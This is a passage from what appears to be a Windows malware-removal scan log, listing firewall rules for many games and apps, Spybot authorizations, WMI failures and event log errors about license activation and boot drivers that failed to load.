FirewallRules: [{281F067D-4520-4004-80F6-32A0E6089BD1}] => (Allow) C:\Program Files\HP\HP ENVY 4520 series\Bin\DeviceSetup.exe
FirewallRules: [{070E3BD2-A6A8-4891-97D6-A4D2D79B90ED}] => (Allow) LPort=5357
FirewallRules: [{BC6962E0-A9E1-45E9-8CF2-F4BA0CE26FFF}] => (Allow) C:\Program Files\HP\HP ENVY 4520 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [TCP Query User{5561F357-1028-459A-B796-A4D123A8600D}D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe] => (Allow) D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe
FirewallRules: [UDP Query User{12859DF5-D5D5-4025-B2F8-E39E76CBB2AA}D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe] => (Allow) D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe
FirewallRules: [TCP Query User{7EE8CDD9-35C7-430D-95D8-451C632D7DCF}D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe] => (Allow) D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe
FirewallRules: [UDP Query User{F311FB22-AA27-4EC6-8AE7-1D9691835D1C}D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe] => (Allow) D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe
FirewallRules: [{33E129CF-48F9-46CD-BCC7-DD8BA14AF12D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Overcooked\Overcooked.exe
FirewallRules: [{16831414-067E-45D0-A4D5-E68B529DB6D5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Overcooked\Overcooked.exe
FirewallRules: [{50A06F50-7F3D-4BDC-9021-237A4C0B2C27}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Atlas Reactor\GlyphClient.exe
FirewallRules: [{1B14D338-DD94-4F52-AD5C-19A32CD5A7BC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Atlas Reactor\GlyphClient.exe
FirewallRules: [TCP Query User{4C44DD46-D7A9-4196-8296-EEC3056A05BA}D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe] => (Block) D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe
FirewallRules: [UDP Query User{0E56461D-D37A-4C4F-A638-64AA8F253EF7}D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe] => (Block) D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe
FirewallRules: [TCP Query User{7B48B31B-0302-4CA8-9E87-F07AB35F2D86}D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe
FirewallRules: [UDP Query User{0CAAB1E6-B8C4-4C54-8EED-E55C7FFDD98D}D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe
FirewallRules: [{4EE9956F-18E1-400E-BF78-B16CA5740983}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Dedicated Server\EmpyrionLauncher.exe
FirewallRules: [{1F4F4B1F-6EB7-49F2-BEB5-C5D20017F534}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Dedicated Server\EmpyrionLauncher.exe
FirewallRules: [{4E13484E-599F-4A55-8783-90ECC346BE91}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Galactic Survival\EmpyrionLauncher.exe
FirewallRules: [{EB02CC0B-C01C-4CF1-B865-43DD5B64DA66}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Galactic Survival\EmpyrionLauncher.exe
FirewallRules: [{56A01BA7-991A-4E71-996A-9DB735036A2A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot\lancealot.exe
FirewallRules: [{164D6B17-3E23-4D7A-8EC8-9B92D2908A27}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot\lancealot.exe
FirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [TCP Query User{EAEAB11E-0749-492A-83F8-9E619C0825FB}D:\spel\company of heroes\bugreport\bugreport.exe] => (Block) D:\spel\company of heroes\bugreport\bugreport.exe
FirewallRules: [UDP Query User{3A908214-3ACB-45F3-87BB-034C922C2A9D}D:\spel\company of heroes\bugreport\bugreport.exe] => (Block) D:\spel\company of heroes\bugreport\bugreport.exe
FirewallRules: [{BC279C92-F389-439A-AA3C-F8FC24E7E3E0}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{54C5FE03-560A-42F0-A953-CC57545F85F2}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{09DF48B2-2698-410B-B67C-DB382410B87B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Portal 2\portal2.exe
FirewallRules: [{89F025E4-A12F-4D64-8F4E-65A58D8FF1E4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Portal 2\portal2.exe
FirewallRules: [TCP Query User{5A0AE274-1115-456E-8097-7259AE6A531D}D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe
FirewallRules: [UDP Query User{15BE3688-275A-40F9-8987-65CFDE79CC41}D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe
FirewallRules: [{6A1EE22B-EFB5-403F-96B8-92BF6419D6D3}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe
FirewallRules: [{4F8E8B43-EDDE-423A-AFB4-558A6797AA1B}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe
FirewallRules: [{587354FE-5AA4-40B2-8BE8-3F068F603006}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Duck Game\DuckGame.exe
FirewallRules: [{2F20DB6C-39DB-42F5-B0EA-93724F169BF7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Duck Game\DuckGame.exe
FirewallRules: [{CEE996FE-EC7E-4B5B-83A4-8D572D4710AC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\TowerFall\TowerFall.exe
FirewallRules: [{66553191-FBFE-4728-8CDE-F8A61645C7E4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\TowerFall\TowerFall.exe
FirewallRules: [{BEC5AC23-37B2-40FD-8357-3AEC0079BE6C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Planet Coaster\PlanetCoaster.exe
FirewallRules: [{D8EFC4A0-1905-4C93-9620-035D8AA25691}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Planet Coaster\PlanetCoaster.exe
FirewallRules: [{ACD083CA-B56C-4A63-AC29-54CF6A0CD632}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Samorost 3\Samorost3.exe
FirewallRules: [{C888B48B-D53E-439A-AC80-145CA44D4737}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Samorost 3\Samorost3.exe
FirewallRules: [TCP Query User{E3430B03-1B85-4352-B782-0FA31716971E}D:\spel\uplay library\forhonor\forhonor.exe] => (Allow) D:\spel\uplay library\forhonor\forhonor.exe
FirewallRules: [UDP Query User{9283DBC8-33C0-43B5-9651-F441DC55A6DF}D:\spel\uplay library\forhonor\forhonor.exe] => (Allow) D:\spel\uplay library\forhonor\forhonor.exe
FirewallRules: [TCP Query User{105F511A-3CF6-48F6-AD6C-051E9FEF4601}D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe] => (Block) D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe
FirewallRules: [UDP Query User{41437AF0-DE88-4AFA-A0CB-DAA1B25D218B}D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe] => (Block) D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe
FirewallRules: [{90F7FC5D-4BDC-4E25-81CF-7F277BC7091B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mainlining\MainliningGame.exe
FirewallRules: [{DBC3A232-DF3B-4592-AAD9-5AD7C9E8EF26}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mainlining\MainliningGame.exe
FirewallRules: [{11C7801C-EA50-48C3-B975-C7808EBB34BA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\River City Ransom Underground\RCRU.exe
FirewallRules: [{A402D5BB-ACD3-4564-8602-D1C3AFE8A5FC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\River City Ransom Underground\RCRU.exe
FirewallRules: [TCP Query User{90E2740D-4865-43C6-91D4-B44837FB7951}D:\spel\doom\doomx64.exe] => (Block) D:\spel\doom\doomx64.exe
FirewallRules: [UDP Query User{91DD21ED-6B7D-4517-ABA8-25131C27A725}D:\spel\doom\doomx64.exe] => (Block) D:\spel\doom\doomx64.exe
FirewallRules: [{0E9497B1-EDF3-4BDA-84E8-C4AF819F2B1F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\BETA\Binaries\Win32\DepthGame.exe
FirewallRules: [{DE8F4F0F-22D5-4E28-9D99-3E79A12D25D0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\BETA\Binaries\Win32\DepthGame.exe
FirewallRules: [TCP Query User{392BB40D-09A3-46AE-B483-4A87F354BBE3}D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe
FirewallRules: [UDP Query User{02BF2D2B-EBEA-47F5-B4FA-A51CBA9A9C83}D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe
FirewallRules: [TCP Query User{94065ED6-5B78-4044-AE30-8E49C3C21237}D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe] => (Block) D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe
FirewallRules: [UDP Query User{27CA16C0-9AB9-4376-AE22-9AA13C815A01}D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe] => (Block) D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe
FirewallRules: [TCP Query User{FF88AE80-179E-4787-99D1-9D9601F0F888}D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [UDP Query User{DE54AA93-CF4F-4466-966B-16CCAAB5E2AF}D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [{1A5EA0B5-372C-4636-865C-96EB70C2B9F8}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{0289A623-6B29-4123-AFAD-83CC04D6E3D1}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{094AA815-F657-443A-BD7D-E8BF39CB1875}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\Beta\AwesomenautsLauncher.exe
FirewallRules: [{E6B49A1F-10BF-4C9D-939D-AF1B9D814811}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\Beta\AwesomenautsLauncher.exe
FirewallRules: [TCP Query User{1B0D9DFE-155E-4872-9EA3-EB0B754A22E9}D:\spel\factorio_0.15.22\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.15.22\bin\x64\factorio.exe
FirewallRules: [UDP Query User{9BB74597-A81A-4634-BF7E-27D90AAE1515}D:\spel\factorio_0.15.22\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.15.22\bin\x64\factorio.exe
FirewallRules: [TCP Query User{A7B37CFC-0381-42BE-827A-63D6A4C34FC8}D:\spel\vikings - wolves of midgard\vikings.exe] => (Allow) D:\spel\vikings - wolves of midgard\vikings.exe
FirewallRules: [UDP Query User{639643C1-BDF4-477C-AD00-3FB55B221BC8}D:\spel\vikings - wolves of midgard\vikings.exe] => (Allow) D:\spel\vikings - wolves of midgard\vikings.exe
FirewallRules: [{2CAC80C4-1DD7-4ED9-AAC9-FA728E9C64C2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\spacegame\Binaries\Win64\Fractured Space.exe
FirewallRules: [{59E06B2C-F0B8-4FD2-8C95-E33BA71B7A52}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\spacegame\Binaries\Win64\Fractured Space.exe
FirewallRules: [TCP Query User{49813E33-F982-4C58-AABE-7AE5DDBB53B7}D:\spel\gauntlet slayer edition\binaries\gauntlet.exe] => (Block) D:\spel\gauntlet slayer edition\binaries\gauntlet.exe
FirewallRules: [UDP Query User{97BB371E-37DD-4871-A9B2-479DDB116DAB}D:\spel\gauntlet slayer edition\binaries\gauntlet.exe] => (Block) D:\spel\gauntlet slayer edition\binaries\gauntlet.exe
FirewallRules: [TCP Query User{AE8E1853-0B69-458C-A91B-357C96D672CA}D:\spel\starcraft ii\versions\base56787\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base56787\sc2_x64.exe
FirewallRules: [UDP Query User{6309873B-0312-49FF-93AF-7FC0CEE92B2B}D:\spel\starcraft ii\versions\base56787\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base56787\sc2_x64.exe
FirewallRules: [TCP Query User{2B66DABB-08DB-4347-B883-42E57A1977E7}D:\spel\divinity original sin 2\bin\eocapp.exe] => (Block) D:\spel\divinity original sin 2\bin\eocapp.exe
FirewallRules: [UDP Query User{B796F551-898A-414D-9130-087E8CDA4764}D:\spel\divinity original sin 2\bin\eocapp.exe] => (Block) D:\spel\divinity original sin 2\bin\eocapp.exe
FirewallRules: [{943F2851-ECFB-4B76-8DB5-790A4F3A2A60}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [{8C09611D-DED5-4A47-9CAD-6B5D30F07DEF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [TCP Query User{B57AE43D-9BD7-4625-9167-9682B1214B8E}D:\spel\starcraft ii\versions\base57507\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base57507\sc2_x64.exe
FirewallRules: [UDP Query User{F54F1B03-C911-4118-898E-C4C6741ED54C}D:\spel\starcraft ii\versions\base57507\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base57507\sc2_x64.exe
FirewallRules: [{A53DA5D6-B330-4B94-9BAD-CBFA322598D2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\BreachAndClear\bnc.exe
FirewallRules: [{0989A382-7FB7-49BD-8948-BB4D18E829E3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\BreachAndClear\bnc.exe
FirewallRules: [{86ECB8A3-9E4D-4BA6-8848-DF1BC1D6BD38}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot Enhanced Edition\lancealot.exe
FirewallRules: [{FB8EF655-CB2D-40B2-BC0A-EE99B096DB04}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot Enhanced Edition\lancealot.exe
FirewallRules: [{1AABF3A0-0D09-40C2-A9AA-0CB0D8D57BF0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\HardWest\HardWest.exe
FirewallRules: [{D9690832-509B-45D6-9409-03836DE16213}] => (Allow) D:\Spel\Steam Library\SteamApps\common\HardWest\HardWest.exe
FirewallRules: [TCP Query User{4D4A7CFE-E3AD-42FE-9ABC-F15ACA432415}D:\spel\satellite reign\satellitereignwindows.exe] => (Allow) D:\spel\satellite reign\satellitereignwindows.exe
FirewallRules: [UDP Query User{B43EA068-17FF-4825-80F1-B7BEA12DBA14}D:\spel\satellite reign\satellitereignwindows.exe] => (Allow) D:\spel\satellite reign\satellitereignwindows.exe
FirewallRules: [{E12C1E12-8918-47BF-9BF0-BB81766D03BA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aragami\Aragami.exe
FirewallRules: [{A2AE5D14-6FD2-41C1-9980-F2E7E63537F2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aragami\Aragami.exe
FirewallRules: [TCP Query User{EAEA4C7A-39C4-439B-A5A3-BC1B39F3E633}D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe] => (Block) D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe
FirewallRules: [UDP Query User{AE9B677E-82BF-4BD9-A500-9799B4349C4F}D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe] => (Block) D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe
FirewallRules: [{C07BD8B9-20CF-40B2-A390-051F5AF605EF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Spintires MudRunner\MudRunner.exe
FirewallRules: [{7E02B52F-A3D5-4771-94A8-9E1BC9A92AE0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Spintires MudRunner\MudRunner.exe
FirewallRules: [TCP Query User{0BC64E8E-D097-4302-8DE7-C52133F3F820}D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [UDP Query User{3F6D9C6D-0D88-42B3-A45B-22E3876F89E7}D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [{41295780-229B-4A41-8874-FA27D76D9D18}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SecretPonchos\bin\SecretPonchosD3D11.exe
FirewallRules: [{7FEB6C09-A3FC-4FE8-8C2F-A73DF3A26029}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SecretPonchos\bin\SecretPonchosD3D11.exe
FirewallRules: [{AE43EF82-F6F7-4C66-9E0E-04BA99ADC5A3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\EvolveGame\Bin64_SteamRetail\Evolve.exe
FirewallRules: [{72A961A6-6F51-4295-8377-36F54B3EDD2D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\EvolveGame\Bin64_SteamRetail\Evolve.exe
FirewallRules: [TCP Query User{51297500-255C-4308-A33D-A59A0226532F}D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe
FirewallRules: [UDP Query User{C086CD1D-6E88-4B53-8234-63A7F7094C27}D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe
FirewallRules: [{B0F4256D-3EB3-4DDB-9525-A5CC400DBC01}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{FD789251-9926-4417-AB50-A72ED2F1CCED}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{478551DD-BFAA-4D54-B66F-4825510EC57B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aven Colony\AvenColony.exe
FirewallRules: [{E87E1A1E-46C6-4F95-A1E6-4CB2F188F244}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aven Colony\AvenColony.exe
FirewallRules: [{4F8620B0-3C73-4A37-BE73-1E679DB228A9}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Strikey Sisters\strikey_sisters.exe
FirewallRules: [{830B508E-2878-4305-82C9-B9B9ADF9AD8D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Strikey Sisters\strikey_sisters.exe
FirewallRules: [{ACB155F9-DBDA-4D65-B643-959BE30D4175}] => (Allow) C:\Program Files\Vivaldi\Application\vivaldi.exe
FirewallRules: [TCP Query User{597DC14B-49DB-40B6-A24A-E3D9953A457D}D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [UDP Query User{A9C2F1E3-849E-4D06-93ED-F0D6A0381D0A}D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [{6E206845-F48F-4619-A3DA-A5516D9D4C5A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\launcher\launcher.exe
FirewallRules: [{CE39CD5A-E51C-48D9-A1E7-2DA4AEF0C6CD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\launcher\launcher.exe
FirewallRules: [{5D35B3A2-F05A-47E7-A169-9FB82F430BF5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Launcher\DCConfig.exe
FirewallRules: [{14725769-536B-4335-A537-4BBAD8646C91}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Launcher\DCConfig.exe
FirewallRules: [{2FFEA717-74A2-4877-89D2-B30E836B1AEE}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Anc\Binaries\Win64\Anc-Win64-Shipping.exe
FirewallRules: [{9EC8F931-3B33-4C1E-8707-F3D9F5D2C37B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Anc\Binaries\Win64\Anc-Win64-Shipping.exe
FirewallRules: [{87FC258F-5BEE-4C60-9620-2854B57C3376}] => (Allow) D:\Spel\Steam Library\SteamApps\common\rocketleague\Binaries\Win32\RocketLeague.exe
FirewallRules: [{6692C423-96D3-48B0-BE61-0A685AA7C369}] => (Allow) D:\Spel\Steam Library\SteamApps\common\rocketleague\Binaries\Win32\RocketLeague.exe
FirewallRules: [TCP Query User{746EE4C5-88A1-49CA-AE82-C024362EC325}D:\spel\unreal tournament goty\system\unrealtournament.exe] => (Allow) D:\spel\unreal tournament goty\system\unrealtournament.exe
FirewallRules: [UDP Query User{1CB765AF-56AD-4340-96E5-5AF7DDC35300}D:\spel\unreal tournament goty\system\unrealtournament.exe] => (Allow) D:\spel\unreal tournament goty\system\unrealtournament.exe
FirewallRules: [{6AA353F1-7DDF-490A-B825-0C9CF5C0597D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\workshop\Workshop.exe
FirewallRules: [{2253BB91-25A5-41A5-A8B1-51264D44C1DC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\workshop\Workshop.exe
FirewallRules: [{F128730D-D7BE-467C-A4BB-0C43215DC4C2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{92BD8855-E433-4E7C-9DA1-BC4ADC152C43}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{4DF2E569-34C8-428A-A8C6-689A8D3132A5}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{180A7648-B41B-49EC-9970-3A15A5246B34}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{CC32B82F-7235-40CF-890F-473BCA9F601D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{45300479-8F32-4A67-916B-F7D53A9DFB52}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{FB9D5CC2-2B07-4B7F-9F63-36452DB69316}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HobLauncher.exe
FirewallRules: [{5B525BF6-E027-4A85-98DB-0B69127E01F5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HobLauncher.exe
FirewallRules: [{E8FF906C-0588-47BE-96E9-0BE363415543}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HOB.exe
FirewallRules: [{986BA986-DD80-4802-9A0A-D9A8D1431284}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HOB.exe
FirewallRules: [{CE43BA91-078E-4D0B-AB12-53C5C0B5839A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service
==================== Restore Points =========================
Could not list restore points
Check "winmgmt" service or repair WMI.
==================== Faulty Device Manager Devices =============
Could not list Devices. Check "winmgmt" service or repair WMI.
==================== Event log errors: =========================
Application errors:
==================
Error: (03/02/2018 11:13:40 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Windows license activation failed. Error 0x80070005.
Error: (03/02/2018 11:12:18 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
Error: (03/02/2018 11:12:13 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Windows license activation failed. Error 0x80070005.
Error: (03/02/2018 10:24:09 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
Error: (03/02/2018 09:26:43 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
Error: (03/02/2018 09:16:43 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
Error: (03/02/2018 08:35:04 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
Error: (03/02/2018 08:29:26 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
System errors:
=============
Error: (03/18/2018 08:19:16 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
AFD
CSC
DfsC
discache
ElbyCDIO
MpFilter
NetBIOS
NetBT
nsiproxy
prilock
Psched
rdbss
spldr
tdx
vpcnfltr
vpcvmm
Wanarpv6
WfpLwf
Error: (03/18/2018 08:19:16 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Task Scheduler service depends on the Windows Event Log service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
Error: (03/18/2018 08:14:00 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
AFD
CSC
DfsC
discache
ElbyCDIO
MpFilter
NetBIOS
NetBT
nsiproxy
prilock
Psched
rdbss
spldr
tdx
vpcnfltr
vpcvmm
Wanarpv6
WfpLwf
Error: (03/18/2018 08:14:00 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Task Scheduler service depends on the Windows Event Log service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
